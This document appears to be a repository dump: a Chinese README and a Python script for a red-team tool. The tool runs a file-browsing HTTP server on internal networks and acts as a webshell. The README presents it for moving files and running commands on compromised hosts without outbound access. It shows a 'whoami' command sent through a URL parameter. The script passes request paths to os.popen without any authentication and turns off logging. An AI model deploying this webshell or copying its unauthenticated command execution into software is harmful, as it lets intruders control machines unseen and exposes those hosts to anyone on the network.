├── README.md └── HTTPServer.py /README.md: -------------------------------------------------------------------------------- 1 | # HTTPServer 2 | 红队内网环境中一个能快速开启HTTP文件浏览服务的小工具 ,可执行Webshell,可用于在内网不出网时文件的下载,启动时会根据网卡IPV4地址输出URL(本地回环除外)。 3 | 4 | ### Options: 5 | ``` 6 | -h, --help show this help message and exit 7 | -p PORT, --port=PORT 自定义端口(默认:8080) 8 | -d DIR, --dir=DIR 自定义目录(默认:当前目录) 9 | -s SHELL, --shell=SHELL 自定义Shell路径(默认:/?shell=) 10 | ``` 11 | ## 使用默认端口 8080 12 | ``` 13 | HTTPServer.exe 14 | ``` 15 | ![图片](https://user-images.githubusercontent.com/34683107/226166730-4cfffe2b-18bf-452a-aa63-dc259f683c08.png) 16 | 17 | 18 | ## 执行Webshell 19 | 自定义Webshell路径:-s 20 | ``` 21 | HTTPServer.exe -p 8888 -d C:\ToolsBox -s Axx8 22 | ``` 23 | Get Shell http://ip:8888/?Axx8=whoami 24 | ![图片](https://user-images.githubusercontent.com/34683107/226166678-1c4a9ef4-0286-4fcc-b07e-9b43cd95ecdf.png) 25 | 26 | 27 | ## 指定端口 -p 28 | ``` 29 | HTTPServer.exe -p 9999 30 | ``` 31 | ![图片](https://user-images.githubusercontent.com/34683107/226166335-8bbb356d-9d31-4bab-9b6d-187c8f2cc7d0.png) 32 | ## 指定目录 -d 33 | ``` 34 | HTTPServer.exe -d C:\ToolsBox 35 | ``` 36 | ![图片](https://user-images.githubusercontent.com/34683107/226166410-852d7da8-df3b-4e3e-b4c4-f27ca28dc0f5.png) 37 | 38 | ## 感谢阅读 39 | ![图片](https://user-images.githubusercontent.com/34683107/188175429-58a71c93-a603-408f-ac9b-c0b616b6467c.png) 40 | -------------------------------------------------------------------------------- /HTTPServer.py: -------------------------------------------------------------------------------- 1 | import ctypes 2 | from http.server import HTTPServer, BaseHTTPRequestHandler 3 | from urllib.parse import urlparse, parse_qs 4 | from optparse import OptionParser 5 | import netifaces 6 | import os 7 | import http.server 8 | import socketserver 9 | 10 | 11 | class MyHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): 12 | def log_message(self, format, *args): 13 | return # 禁用日志输出 14 | def do_GET(self): 15 | if shell_cmd in self.path: 16 | cmd = self.path.replace('/?','').replace('%20',' ').replace('=',' ').replace(shell_cmd,'').replace('shell','') 17 | cmd = os.popen(cmd).read() 18 | self.wfile.write(cmd.encode()) 19 | return http.server.SimpleHTTPRequestHandler.do_GET(self) 20 | 21 | #显示所有网络接口 22 | def get_local_ipv4_addresses(): 23 | ipv4_addresses = [] 24 | # 获取当前计算机的所有网络接口 25 | interfaces = netifaces.interfaces() 26 | for interface in interfaces: 27 | addresses = netifaces.ifaddresses(interface) 28 | # 获取当前网络接口的 IPv4 地址 29 | if netifaces.AF_INET in addresses: 30 | ipv4_info = addresses[netifaces.AF_INET] 31 | for info in ipv4_info: 32 | ip = info['addr'] 33 | # 排除本地回环地址和 IPv6 地址 34 | if ip.startswith('127.') or ':' in ip: 35 | continue 36 | ipv4_addresses.append(ip) 37 | return ipv4_addresses 38 | 39 | def Banner(): 40 | print(""" _ _ _______ _______ _____ _____ 41 | | | | |__ __|__ __| __ \ / ____| 42 | | |__| | | | | | | |__) | (___ ___ _ ____ _____ _ __ 43 | | __ | | | | | | ___/ \___ \ / _ \ '__\ \ / / _ \ '__| 44 | | | | | | | | | | | ____) | __/ | \ V / __/ | 45 | |_| |_| |_| |_| |_| |_____/ \___|_| \_/ \___|_| 46 | 47 | https://github.com/Axx8/HTTPServer \n """) 48 | print(""" Options: 49 | -h, --help show this help message and exit 50 | -p PORT, --port=PORT 自定义端口(默认:8080) 51 | -d DIR, --dir=DIR 自定义目录(默认:当前目录) 52 | -s SHELL, --shell=SHELL 自定义Shell路径(默认:/?shell=)\n""") 53 | # 当前共享目录 54 | print(f' in directory {os.getcwd()}\n') 55 | for ip in ipv4_addresses: 56 | print(f' Starting HTTP server http://{ip}:{port}') 57 | print(f'\n Get Shell http://ip:{port}/?{shell_cmd}=whoami') 58 | 59 | 60 | ctypes.windll.kernel32.SetConsoleTitleW("HTTPServer Axx8 HTTP文件浏览服务 ") 61 | 62 | if __name__ == '__main__': 63 | ipv4_addresses = get_local_ipv4_addresses() 64 | if not ipv4_addresses: 65 | print('No non-loopback IPv4 address found.') 66 | else: 67 | try: 68 | parser = OptionParser() 69 | parser.add_option("-p", "--port", dest="port", default=8080, help="自定义端口(默认:8080)") 70 | parser.add_option("-d", "--dir", dest="dir", default=os.getcwd(), help="自定义目录(默认:当前目录)") 71 | parser.add_option("-s", "--shell", dest="shell", default='shell', help="自定义Shell路径(默认:/?shell=)") 72 | (options, args) = parser.parse_args() 73 | port = int(options.port) 74 | server_address = ('', port) 75 | os.chdir(options.dir) 76 | shell_cmd = options.shell 77 | 78 | httpd = socketserver.TCPServer(("", port), MyHTTPRequestHandler) 79 | Banner() 80 | httpd.serve_forever() 81 | except OSError as e: 82 | print(""" _ _ _______ _______ _____ _____ 83 | | | | |__ __|__ __| __ \ / ____| 84 | | |__| | | | | | | |__) | (___ ___ _ ____ _____ _ __ 85 | | __ | | | | | | ___/ \___ \ / _ \ '__\ \ / / _ \ '__| 86 | | | | | | | | | | | ____) | __/ | \ V / __/ | 87 | |_| |_| |_| |_| |_| |_____/ \___|_| \_/ \___|_| 88 | 89 | https://github.com/Axx8/HTTPServer \n """) 90 | print(""" Options: 91 | -h, --help show this help message and exit 92 | -p PORT, --port=PORT 自定义端口(默认:8080) 93 | -d DIR, --dir=DIR 自定义目录(默认:当前目录) 94 | -s SHELL, --shell=SHELL 自定义Shell路径(默认:/?shell=)\n""") 95 | print(e) 96 | print(e) 97 | print(e) 98 | os.system('pause') 99 | except Exception as ee: 100 | print(ee) 101 | os.system('pause') 102 | --------------------------------------------------------------------------------